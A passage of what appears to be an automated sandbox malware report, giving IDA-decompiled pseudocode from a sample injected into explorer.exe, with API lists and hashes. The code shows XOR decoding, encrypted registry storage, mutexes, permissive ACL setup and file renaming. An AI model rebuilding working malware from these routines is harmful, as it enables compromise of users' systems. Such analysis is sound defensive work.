                            								 *((intOrPtr*)(_t98 + 0x1c))();
                            								_t155[0x43] = _v8;
                            								_t101 = E0008C379(_t177);
                            								 *_t155 = _t101;
                            								__eflags = _t101;
                            								if(_t101 == 0) {
                            									L32:
                            									E0008861A( &_v20, 0xffffffff);
                            									return _t155;
                            								} else {
                            									goto L31;
                            								}
                            								do {
                            									L31:
                            									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
                            									_t176 = _t176 + 1;
                            									__eflags = _t176 -  *_t155;
                            								} while (_t176 <  *_t155);
                            								goto L32;
                            							}
                            							_v16 = _t176;
                            							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
                            							__eflags = _t111;
                            							if(_t111 == 0) {
                            								_t112 = _a8;
                            								__eflags = _t112;
                            								if(_t112 != 0) {
                            									 *_t112 = _t176;
                            								}
                            								_push(_v16);
                            								goto L30;
                            							}
                            							L23:
                            							E0008861A( &_v44, 0x110);
                            							memset( &_v108, _t176, 0x40);
                            							E0008861A( &_v20, 0xffffffff);
                            							goto L1;
                            						}
                            						_push(_t176);
                            						_push(_v16);
                            						_t178 = "\\";
                            						_push(_t178);
                            						_t133 = E00089292(_v12);
                            						_t181 = _t181 + 0x10;
                            						_v40 = _t133;
                            						__eflags = _t133;
                            						if(_t133 == 0) {
                            							goto L23;
                            						}
                            						_t134 =  *0x9e68c; // 0xc2fab8
                            						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
                            						__eflags = _t135;
                            						if(_t135 == 0) {
                            							_t136 =  *0x9e68c; // 0xc2fab8
                            							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
                            						} else {
                            							_t143 = E000895E1( &_v36, 0x34);
                            							_v24 = _t143;
                            							_t179 = E000892E5(_v32);
                            							_v32 = _t179;
                            							E000885D5( &_v24);
                            							_t183 = _t181 + 0x18;
                            							_t147 = E00089256(_v12);
                            							_v24 = _t147;
                            							_t148 =  *0x9e68c; // 0xc2fab8
                            							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
                            							__eflags = _t149;
                            							if(_t149 == 0) {
                            								_t154 = _a12;
                            								__eflags = _t154;
                            								if(_t154 != 0) {
                            									 *_t154 = 1;
                            								}
                            							}
                            							E0008861A( &_v32, 0xfffffffe);
                            							E0008861A( &_v24, 0xfffffffe);
                            							_t181 = _t183 + 0x10;
                            							_t178 = "\\";
                            						}
                            						_t139 = E00089292(_v12);
                            						_t171 =  *0x9e684; // 0xc2f8f0
                            						_t181 = _t181 + 0x18;
                            						_t177 = _t139;
                            						_v20 = _t177;
                            						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
                            						E0008861A( &_v40, 0xffffffff);
                            						goto L21;
                            					}
                            				}
                            				L1:
                            				return 0;
                            			}

                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
                            • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
                            • Opcode Fuzzy Hash: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
                            • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _t12;
                            				void* _t20;
                            				void* _t22;
                            				union _TOKEN_INFORMATION_CLASS _t28;
                            				void* _t31;
                            
                            				_push(_t22);
                            				_push(_t22);
                            				_t31 = 0;
                            				_t28 = __edx;
                            				_t20 = _t22;
                            				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                            					L6:
                            					_t12 = _t31;
                            				} else {
                            					_t31 = E00088604(_v8);
                            					_v12 = _t31;
                            					if(_t31 != 0) {
                            						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                            							goto L6;
                            						} else {
                            							E0008861A( &_v12, _t16);
                            							goto L3;
                            						}
                            					} else {
                            						L3:
                            						_t12 = 0;
                            					}
                            				}
                            				return _t12;
                            			}

                            APIs
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                            • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationToken$AllocateErrorHeapLast
                            • String ID:
                            • API String ID: 2499131667-0
                            • Opcode ID: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
                            • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                            • Opcode Fuzzy Hash: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
                            • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
                            				intOrPtr _t10;
                            				void* _t13;
                            				void* _t19;
                            				signed int _t21;
                            				signed int _t22;
                            
                            				_t13 = __edx;
                            				if(__ecx != 0) {
                            					_t22 = 0;
                            					_t19 = CreateMutexA(0, 1, __ecx);
                            					if(_t19 != 0) {
                            						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
                            							_t22 = 1;
                            							 *_a4 = _t19;
                            						} else {
                            							_t10 =  *0x9e684; // 0xc2f8f0
                            							 *((intOrPtr*)(_t10 + 0x30))(_t19);
                            						}
                            					} else {
                            						GetLastError();
                            						_t22 = 0xffffffff;
                            					}
                            				} else {
                            					_t22 = _t21 | 0xffffffff;
                            				}
                            				return _t22;
                            			}

                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                            • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastMutex
                            • String ID:
                            • API String ID: 1925916568-0
                            • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                            • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                            • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                            • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008A471(CHAR* __ecx, void* __edx) {
                            				intOrPtr _t8;
                            				void* _t16;
                            				void* _t17;
                            
                            				_t16 = __edx; // executed
                            				_t17 = CreateMutexA(0, 1, __ecx);
                            				if(_t17 != 0) {
                            					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
                            						_t8 =  *0x9e684; // 0xc2f8f0
                            						 *((intOrPtr*)(_t8 + 0x30))(_t17);
                            						_t17 = 0;
                            					}
                            					return _t17;
                            				}
                            				GetLastError();
                            				return 0;
                            			}

                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
                            • GetLastError.KERNEL32 ref: 0008A48B
                            • GetLastError.KERNEL32 ref: 0008A495
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CreateMutex
                            • String ID:
                            • API String ID: 200418032-0
                            • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                            • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
                            • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                            • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E00086DA0(void* __eflags, void* __fp0) {
                            				short _v536;
                            				WCHAR* _v544;
                            				WCHAR* _t9;
                            				intOrPtr _t10;
                            				intOrPtr _t11;
                            				void* _t22;
                            				void* _t32;
                            				intOrPtr _t34;
                            				intOrPtr _t35;
                            				intOrPtr _t41;
                            				intOrPtr _t43;
                            				intOrPtr _t46;
                            				intOrPtr _t49;
                            				void* _t51;
                            				void* _t53;
                            				void* _t56;
                            				WCHAR* _t59;
                            				signed int _t60;
                            				void* _t62;
                            				void* _t63;
                            				void* _t74;
                            
                            				_t74 = __fp0;
                            				_t34 =  *0x9e778; // 0xc2fc08
                            				_t62 = (_t60 & 0xfffffff8) - 0x21c;
                            				_t51 = 0x31;
                            				_t32 = 1; // executed
                            				_t9 = E00089ED0(_t34, _t51); // executed
                            				if(_t9 != 0) {
                            					_t10 =  *0x9e78c; // 0x0
                            					_t66 = _t10;
                            					if(_t10 == 0) {
                            						_t49 =  *0x9e688; // 0xb0000
                            						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
                            						 *0x9e78c = _t10;
                            					}
                            					_push(0);
                            					_push(_t10);
                            					_t11 =  *0x9e688; // 0xb0000
                            					_push(L"\\c");
                            					_t9 = E000892E5(_t11 + 0x438);
                            					_t59 = _t9;
                            					_t63 = _t62 + 0x10;
                            					_v544 = _t59;
                            					if(_t59 != 0) {
                            						while(1) {
                            							_t35 =  *0x9e688; // 0xb0000
                            							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
                            							if(_t56 == 0) {
                            								break;
                            							}
                            							if(E0008B269(_t59) == 0) {
                            								_t32 = E0008F14F(_t59, 0x1388, _t74);
                            							}
                            							E0008A4DB(_t56);
                            							_t41 =  *0x9e684; // 0xc2f8f0
                            							 *((intOrPtr*)(_t41 + 0x30))(_t56);
                            							if(_t32 > 0) {
                            								E0008980C( &_v544);
                            								_t43 =  *0x9e778; // 0xc2fc08
                            								_t53 = 0x33;
                            								if(E00089ED0(_t43, _t53) != 0) {
                            									L12:
                            									__eflags = E00081C68(_t59, __eflags, _t74);
                            									if(__eflags >= 0) {
                            										E0008B1B1(_t59, _t53, __eflags, _t74);
                            										continue;
                            									}
                            								} else {
                            									_t46 =  *0x9e778; // 0xc2fc08
                            									_t53 = 0x12;
                            									_t22 = E00089ED0(_t46, _t53);
                            									_t72 = _t22;
                            									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
                            										_push(E0008980C(0));
                            										E00089640( &_v536, 0x104, L"%s.%u", _t59);
                            										_t63 = _t63 + 0x14;
                            										MoveFileW(_t59,  &_v536);
                            										continue;
                            									} else {
                            										goto L12;
                            									}
                            								}
                            							}
                            							break;
                            						}
                            						_t9 = E0008861A( &_v544, 0xfffffffe);
                            					}
                            				}
                            				return _t9;
                            			}

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileMove
                            • String ID: %s.%u
                            • API String ID: 3562171763-1288070821
                            • Opcode ID: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
                            • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
                            • Opcode Fuzzy Hash: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
                            • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E00082AEA() {
                            				intOrPtr _v8;
                            				signed int _v12;
                            				CHAR* _v16;
                            				signed int _t16;
                            				intOrPtr _t21;
                            				intOrPtr _t22;
                            				void* _t26;
                            				void* _t29;
                            				signed int _t31;
                            				intOrPtr _t36;
                            				CHAR* _t38;
                            				intOrPtr _t39;
                            				void* _t40;
                            
                            				_t15 =  *0x9e710 * 0x64;
                            				_t39 = 0;
                            				_v12 =  *0x9e710 * 0x64;
                            				_t16 = E00088604(_t15);
                            				_t38 = _t16;
                            				_v16 = _t38;
                            				if(_t38 != 0) {
                            					_t31 =  *0x9e710; // 0x2
                            					_t36 = 0;
                            					_v8 = 0;
                            					if(_t31 == 0) {
                            						L9:
                            						_push(_t38);
                            						E00089F48(0xe); // executed
                            						E0008861A( &_v16, _t39);
                            						return 0;
                            					}
                            					_t29 = 0;
                            					do {
                            						_t21 =  *0x9e714; // 0xc0f588
                            						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
                            							if(_t39 != 0) {
                            								lstrcatA(_t38, "|");
                            								_t39 = _t39 + 1;
                            							}
                            							_t22 =  *0x9e714; // 0xc0f588
                            							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
                            							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
                            							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
                            							_t31 =  *0x9e710; // 0x2
                            							_t40 = _t40 + 0x18;
                            							_t36 = _v8;
                            							_t39 = _t39 + _t26;
                            						}
                            						_t36 = _t36 + 1;
                            						_t29 = _t29 + 0x20;
                            						_v8 = _t36;
                            					} while (_t36 < _t31);
                            					goto L9;
                            				}
                            				return _t16 | 0xffffffff;
                            			}

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcat
                            • String ID: %u;%u;%u
                            • API String ID: 3011335133-2973439046
                            • Opcode ID: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
                            • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
                            • Opcode Fuzzy Hash: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
                            • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E0008BD10() {
                            				char _v8;
                            				void* _v12;
                            				char _v16;
                            				short _v20;
                            				char _v24;
                            				short _v28;
                            				char _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				intOrPtr _v76;
                            				intOrPtr _v88;
                            				intOrPtr _v92;
                            				void _v96;
                            				intOrPtr _t58;
                            				intOrPtr _t61;
                            				intOrPtr _t63;
                            				intOrPtr _t65;
                            				intOrPtr _t67;
                            				intOrPtr _t70;
                            				intOrPtr _t73;
                            				intOrPtr _t77;
                            				intOrPtr _t79;
                            				intOrPtr _t81;
                            				intOrPtr _t85;
                            				intOrPtr _t87;
                            				signed int _t90;
                            				void* _t92;
                            				intOrPtr _t93;
                            				void* _t98;
                            
                            				_t90 = 8;
                            				_v28 = 0xf00;
                            				_v32 = 0;
                            				_v24 = 0;
                            				memset( &_v96, 0, _t90 << 2);
                            				_v20 = 0x100;
                            				_push( &_v12);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_v16 = 0;
                            				_push(0);
                            				_v8 = 0;
                            				_push(1);
                            				_v12 = 0;
                            				_push( &_v24);
                            				_t58 =  *0x9e68c; // 0xc2fab8
                            				_t98 = 0;
                            				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
                            					L14:
                            					if(_v8 != 0) {
                            						_t67 =  *0x9e68c; // 0xc2fab8
                            						 *((intOrPtr*)(_t67 + 0x10))(_v8);
                            					}
                            					if(_v12 != 0) {
                            						_t65 =  *0x9e68c; // 0xc2fab8
                            						 *((intOrPtr*)(_t65 + 0x10))(_v12);
                            					}
                            					if(_t98 != 0) {
                            						_t63 =  *0x9e684; // 0xc2f8f0
                            						 *((intOrPtr*)(_t63 + 0x34))(_t98);
                            					}
                            					if(_v16 != 0) {
                            						_t61 =  *0x9e684; // 0xc2f8f0
                            						 *((intOrPtr*)(_t61 + 0x34))(_v16);
                            					}
                            					L22:
                            					return _t98;
                            				}
                            				_v68 = _v12;
                            				_t70 =  *0x9e688; // 0xb0000
                            				_t92 = 2;
                            				_v96 = 0x1fffff;
                            				_v92 = 0;
                            				_v88 = 3;
                            				_v76 = 0;
                            				_v72 = 5;
                            				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
                            					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
                            						goto L7;
                            					}
                            					goto L4;
                            				} else {
                            					L4:
                            					_push( &_v8);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(1);
                            					_push(_t92);
                            					_push(_t92);
                            					_push( &_v32);
                            					_t85 =  *0x9e68c; // 0xc2fab8
                            					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
                            						goto L14;
                            					} else {
                            						_t87 = _v8;
                            						if(_t87 != 0) {
                            							_push(2);
                            							_pop(1);
                            							_v64 = 0x1fffff;
                            							_v60 = 1;
                            							_v56 = 3;
                            							_v44 = 0;
                            							_v40 = 1;
                            							_v36 = _t87;
                            						}
                            						L7:
                            						_push( &_v16);
                            						_push(0);
                            						_push( &_v96);
                            						_t73 =  *0x9e68c; // 0xc2fab8
                            						_push(1); // executed
                            						if( *((intOrPtr*)(_t73 + 8))() != 0) {
                            							goto L14;
                            						}
                            						_t98 = LocalAlloc(0x40, 0x14);
                            						if(_t98 == 0) {
                            							goto L14;
                            						}
                            						_t93 =  *0x9e68c; // 0xc2fab8
                            						_push(1);
                            						_push(_t98);
                            						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
                            							goto L14;
                            						}
                            						_t77 =  *0x9e68c; // 0xc2fab8
                            						_push(0);
                            						_push(_v16);
                            						_push(1);
                            						_push(_t98);
                            						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
                            							goto L14;
                            						}
                            						if(_v8 != 0) {
                            							_t81 =  *0x9e68c; // 0xc2fab8
                            							 *((intOrPtr*)(_t81 + 0x10))(_v8);
                            						}
                            						_t79 =  *0x9e68c; // 0xc2fab8
                            						 *((intOrPtr*)(_t79 + 0x10))(_v12);
                            						goto L22;
                            					}
                            				}
                            			}







































                            APIs
                            • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocEntriesLocal
                            • String ID:
                            • API String ID: 2146116654-0
                            • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                            • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
                            • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                            • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
                            				char* _v12;
                            				char _v16;
                            				int _v20;
                            				signed int _v24;
                            				intOrPtr _v28;
                            				char* _v32;
                            				char _v52;
                            				char _v64;
                            				char _v328;
                            				char _v2832;
                            				signed int _t48;
                            				signed int _t49;
                            				char* _t54;
                            				long _t73;
                            				long _t80;
                            				long _t83;
                            				intOrPtr _t84;
                            				void* _t88;
                            				char* _t89;
                            				intOrPtr _t90;
                            				void* _t103;
                            				void* _t104;
                            				char* _t106;
                            				intOrPtr _t107;
                            				char _t108;
                            
                            				_t48 = __ecx;
                            				_t89 = __edx;
                            				_v24 = __ecx;
                            				if(_a4 == 0 || _a8 == 0) {
                            					L13:
                            					_t49 = _t48 | 0xffffffff;
                            					__eflags = _t49;
                            					return _t49;
                            				} else {
                            					_t115 = __edx;
                            					if(__edx == 0) {
                            						goto L13;
                            					}
                            					_t107 =  *((intOrPtr*)(__ecx + 0x108));
                            					_push(_t107);
                            					_t103 = 4;
                            					_v12 = __edx;
                            					_v28 = E0008D400( &_v12, _t103);
                            					_t93 = _t107 + __edx;
                            					E00092301(_t107 + __edx,  &_v2832);
                            					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
                            					_t108 = _a8;
                            					_v12 = _t54;
                            					_v20 = _t54 + 6 + _t108;
                            					_t106 = E00088604(_t54 + 6 + _t108);
                            					_v32 = _t106;
                            					if(_t106 != 0) {
                            						 *_t106 = _a12;
                            						_t16 =  &(_t106[6]); // 0x6
                            						_t106[1] = 1;
                            						_t106[2] = _t108;
                            						E000886E1(_t16, _a4, _t108);
                            						_t21 = _t108 + 6; // 0x6
                            						E000922D3( &_v2832, _t21 + _t106, _v12);
                            						_v16 = _t89;
                            						_t90 = _v24;
                            						_v12 =  *((intOrPtr*)(_t90 + 0x108));
                            						_push( &_v52);
                            						_t104 = 8;
                            						E0008F490( &_v16, _t104);
                            						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
                            						E0008EB2E(_t106, _v20,  &_v328);
                            						_t73 = E00089B0E(_t90);
                            						_v12 = _t73;
                            						__eflags = _t73;
                            						if(_t73 != 0) {
                            							E000897A0(_v28,  &_v64, 0x10);
                            							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
                            							__eflags = _t80;
                            							if(_t80 == 0) {
                            								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
                            								__eflags = _t83;
                            								if(_t83 != 0) {
                            									_push(0xfffffffc);
                            									_pop(0);
                            								}
                            								_t84 =  *0x9e68c; // 0xc2fab8
                            								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
                            							} else {
                            								_push(0xfffffffd);
                            								_pop(0);
                            							}
                            							E0008861A( &_v12, 0xffffffff);
                            						}
                            						E0008861A( &_v32, 0);
                            						return 0;
                            					}
                            					_t88 = 0xfffffffe;
                            					return _t88;
                            				}
                            			}





























                            APIs
                              • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapOpen_ftol2_sse
                            • String ID:
                            • API String ID: 3756893521-0
                            • Opcode ID: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
                            • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
                            • Opcode Fuzzy Hash: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
                            • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _t45;
                            				intOrPtr _t46;
                            				intOrPtr _t48;
                            				intOrPtr _t49;
                            				void* _t52;
                            				intOrPtr _t53;
                            				intOrPtr _t54;
                            				struct _SECURITY_ATTRIBUTES* _t58;
                            				intOrPtr _t59;
                            				intOrPtr _t61;
                            				intOrPtr _t65;
                            				intOrPtr _t66;
                            				intOrPtr _t67;
                            				intOrPtr _t69;
                            				struct _SECURITY_ATTRIBUTES* _t73;
                            				intOrPtr _t74;
                            				intOrPtr _t77;
                            				intOrPtr _t78;
                            				intOrPtr _t79;
                            				intOrPtr _t82;
                            				intOrPtr _t83;
                            				void* _t86;
                            				intOrPtr _t87;
                            				intOrPtr _t89;
                            				signed int _t92;
                            				intOrPtr _t97;
                            				intOrPtr _t98;
                            				int _t106;
                            				intOrPtr _t110;
                            				signed int _t112;
                            				signed int _t113;
                            				void* _t115;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_v8 = __edx;
                            				_v12 = __ecx;
                            				_t77 =  *0x9e76c; // 0x1e0
                            				_t73 = 0;
                            				if(E0008A4BF(_t77, 0x7530) >= 0) {
                            					_t45 =  *0x9e770; // 0xc0f8a0
                            					_t112 = 0;
                            					_t106 = 0;
                            					do {
                            						_t78 =  *((intOrPtr*)(_t106 + _t45));
                            						if(_t78 == 0) {
                            							L6:
                            							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
                            								_t113 = _t112 << 5;
                            								if(_v8 == _t73) {
                            									 *(_t113 + _t45 + 0x10) = _t73;
                            									_t46 =  *0x9e770; // 0xc0f8a0
                            									 *(_t113 + _t46 + 0xc) = _t73;
                            									L14:
                            									_t79 =  *0x9e770; // 0xc0f8a0
                            									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
                            									_t48 =  *0x9e770; // 0xc0f8a0
                            									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
                            									_t49 = E0008A471(0, 1);
                            									_t82 =  *0x9e770; // 0xc0f8a0
                            									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
                            									_t83 =  *0x9e770; // 0xc0f8a0
                            									_t30 = _t83 + _t113 + 4; // 0xc0f8a4
                            									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
                            									_t53 =  *0x9e770; // 0xc0f8a0
                            									 *(_t113 + _t53) = _t52;
                            									_t54 =  *0x9e770; // 0xc0f8a0
                            									_t86 =  *(_t113 + _t54);
                            									if(_t86 != 0) {
                            										SetThreadPriority(_t86, 0xffffffff);
                            										_t87 =  *0x9e770; // 0xc0f8a0
                            										 *0x9e774 =  *0x9e774 + 1;
                            										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
                            										_t74 =  *0x9e770; // 0xc0f8a0
                            										_t73 = _t74 + _t113;
                            									} else {
                            										_t59 =  *0x9e684; // 0xc2f8f0
                            										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
                            										_t61 =  *0x9e770; // 0xc0f8a0
                            										_t37 = _t61 + 0xc; // 0xc0f8ac
                            										_t91 = _t37 + _t113;
                            										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
                            											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
                            											_t61 =  *0x9e770; // 0xc0f8a0
                            										}
                            										_t92 = 8;
